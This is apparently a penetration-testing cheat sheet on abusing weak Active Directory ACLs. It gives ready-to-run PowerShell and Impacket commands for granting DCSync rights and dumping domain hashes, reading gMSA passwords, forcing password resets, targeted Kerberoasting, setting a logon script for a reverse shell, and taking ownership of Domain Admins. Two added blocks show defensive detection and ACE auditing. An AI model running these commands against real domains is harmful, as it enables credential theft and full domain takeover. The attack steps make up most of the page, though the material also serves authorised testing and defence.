# Abuse Weak Access Control Lists (ACLs)

## **Write DACL**

{% code overflow="wrap" %}

```powershell
$CompromisedUser = 'CompromisedUser'
$SecPassword = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUser,$SecPassword
# WriteDacl on the domain head lets the principal grant itself the replication (DCSync) rights.
# -TargetIdentity is the domain's distinguished name (placeholder below).
Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity $CompromisedUser -Credential $Cred -Rights DCSync
```

{% endcode %}

*From the attacking box*

```bash
secretsdump.py $domain/user@$ip
```

## **GetChangesAll (DCSync)**

*From the attacking box*

```bash
secretsdump.py domain/user@ip
```

Or use Mimikatz
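Detection on the defender side, as an added example that is not part of the original notes: the replication extended rights that DCSync relies on are audited as event 4662 on a domain controller when Directory Service Access auditing is enabled. The script below pulls those events and keeps the ones whose subject is not a machine account; the GUIDs are the documented replication rights, while the function name and the one-day window are the example's own assumptions.

```powershell
# Added example (not from the original notes): hunt for DCSync-style replication
# requests in a domain controller's Security log. Assumes "Audit Directory Service
# Access" is enabled so that 4662 is logged for replication rights.
$ReplicationGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes-All
    '89e95b76-444d-4c62-991a-0facbeda640c'   # DS-Replication-Get-Changes-In-Filtered-Set
)

function Find-ReplicationRequest {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,   # a domain controller
        [datetime]$StartTime = (Get-Date).AddDays(-1)
    )
    $filter = @{ LogName = 'Security'; Id = 4662; StartTime = $StartTime }
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
      ForEach-Object {
        # Flatten the EventData block into a name -> value table
        $x = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        $props = [string]$d['Properties']
        $hits = $ReplicationGuids | Where-Object { $props -match $_ }
        if (-not $hits) { return }
        $subjectUser = [string]$d['SubjectUserName']
        [pscustomobject]@{
            Time      = $_.TimeCreated
            Subject   = "$($d['SubjectDomainName'])\$subjectUser"
            Object    = $d['ObjectName']
            Rights    = ($hits -join ',')
            # Domain controllers replicate legitimately; their accounts end in '$'.
            # Other legitimate requesters (e.g. a directory-sync service account) must be allow-listed by name.
            IsMachine = $subjectUser.EndsWith('$')
        }
      } | Where-Object { -not $_.IsMachine }
}

Find-ReplicationRequest | Format-Table -AutoSize
```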

## **ReadGMSApassword**

#### Remotely

*You may need to run `ntpdate $domain` first if you get a clock skew error*

```bash
python2 /opt/gMSADumper/gMSADumper.py -d $domain -u CompromisedUser -p Password
```

#### Locally

```powershell
.\GMSAPasswordReader.exe --AccountName 'ReadGMSApassword_Rights_To_User'
```

## **ForceChangePassword**

{% code overflow="wrap" %}

```powershell
$CompromisedUserName = 'CompromisedUserName'
$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass
$LateralEscUserPass = ConvertTo-SecureString 'LateralEscUserPass' -AsPlainText -Force
Set-DomainUserPassword -Identity LateralEscUserName -AccountPassword $LateralEscUserPass -Credential $Cred
```

{% endcode %}

## **GenericAll**

{% code overflow="wrap" %}

```powershell
$CompromisedUserName = 'CompromisedUserName'
$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass
Invoke-Command -ComputerName 127.0.0.1 -ScriptBlock {Set-ADAccountPassword -Identity LateralEscUserName -Reset -NewPassword (ConvertTo-SecureString -AsPlainText 'password' -Force)} -Credential $Cred
```

{% endcode %}

## **GenericWrite**

*Use this to set `scriptpath=` (a logon script, e.g. for a reverse shell), for enumeration, or to set `serviceprincipalname=` for a targeted Kerberoast.*

{% code overflow="wrap" %}

```powershell
$CompromisedUserName = 'CompromisedUserName'
$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass
# Targeted Kerberoast: write an SPN onto the target user, then request a ticket for that user
Set-DomainObject -Credential $Cred -Identity LateralEscUserName -Set @{serviceprincipalname='thescriptkid/thescriptkid'}
Get-DomainUser -Credential $Cred -Identity LateralEscUserName | Get-DomainSPNTicket -Credential $Cred | fl
```

{% endcode %}

#### OR

{% code overflow="wrap" %}

```powershell
# Single-quoted string: one backslash per path separator, no escaping needed
Set-DomainObject -Credential $Cred -Identity LateralEscUserName -Set @{scriptpath='C:\path\to\script.ps1'}
```

{% endcode %}

## **WriteOwner**

{% code overflow="wrap" %}

```powershell
$CompromisedUserName = 'CompromisedUserName'
$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass
# Take ownership of the group, grant full rights as the new owner, then add the user
Set-DomainObjectOwner -Credential $Cred -Identity "Domain Admins" -OwnerIdentity CompromisedUser
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Domain Admins" -PrincipalIdentity CompromisedUser -Rights All
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'CompromisedUser' -Credential $Cred
```

{% endcode %}

## Automation

*Find ACLs of interest, whether held by the current compromised user or by other users found along the way. Start with the current user.*

{% code overflow="wrap" %}

```powershell
# ACEs held by the current compromised user
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -like "*CompromisedUser*"}
# GenericAll ACEs held by anything other than a computer account
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -like "*GenericAll*"} | Where-Object {$_.IdentityReferenceClass -ne "computer"}
```

{% endcode %}
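The defender's counterpart to the enumeration above, added here and not part of the original notes: an audit with the RSAT ActiveDirectory module that lists ACEs granting the rights this page abuses (GenericAll, WriteDacl, WriteOwner, GenericWrite, the force-change-password extended right and the replication extended rights) to principals outside a short allow-list. The function name, the allow-list regex and the object scope are the example's own assumptions; the GUIDs are the well-known extended-right identifiers.

```powershell
# Added example (not from the original notes): find ACEs that hand out the rights abused above.
# Assumes the RSAT ActiveDirectory module and read access to the objects being checked.
Import-Module ActiveDirectory

# Well-known extended-right GUIDs relevant to this page
$RightGuids = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password'
}
# Rights that are dangerous whatever the object type GUID says
$DangerousRights = 'GenericAll|WriteDacl|WriteOwner|GenericWrite'
# Deliberately short allow-list (assumption): anything else holding these rights gets reported.
# Built-ins such as Account Operators will show up and are worth reviewing rather than hiding.
$ExpectedPrincipals = '^(NT AUTHORITY\\(SYSTEM|ENTERPRISE DOMAIN CONTROLLERS)|BUILTIN\\Administrators|[^\\]+\\(Domain Admins|Enterprise Admins|Domain Controllers|Administrators))$'

function Get-DangerousAce {
    param([Parameter(Mandatory)][string]$DistinguishedName)
    $acl = Get-Acl -Path "AD:\$DistinguishedName"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $who = $ace.IdentityReference.Value
        if ($who -match $ExpectedPrincipals) { continue }
        $rights = $ace.ActiveDirectoryRights.ToString()   # e.g. "WriteProperty, ExtendedRight"
        $guid = $ace.ObjectType.ToString()
        $label = $null
        if ($rights -match $DangerousRights) {
            $label = (($rights -split ', ') | Where-Object { $_ -match $DangerousRights }) -join ','
        } elseif ($RightGuids.ContainsKey($guid)) {
            $label = $RightGuids[$guid]
        } elseif ($rights -match 'ExtendedRight' -and $guid -eq '00000000-0000-0000-0000-000000000000') {
            $label = 'All extended rights'   # covers DCSync and force-change-password
        }
        if ($label) {
            [pscustomobject]@{ Object = $DistinguishedName; Principal = $who; Right = $label; Inherited = $ace.IsInherited }
        }
    }
}

# Scope (assumption): the domain head, where replication rights live, plus users, groups and gMSAs.
# Narrow -SearchBase to an OU in a large domain.
$domainDn = (Get-ADDomain).DistinguishedName
$targets = @($domainDn) + (Get-ADObject -LDAPFilter '(|(objectCategory=person)(objectCategory=group)(objectClass=msDS-GroupManagedServiceAccount))' -SearchBase $domainDn).DistinguishedName
$targets | ForEach-Object { Get-DangerousAce -DistinguishedName $_ } | Format-Table -AutoSize
```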
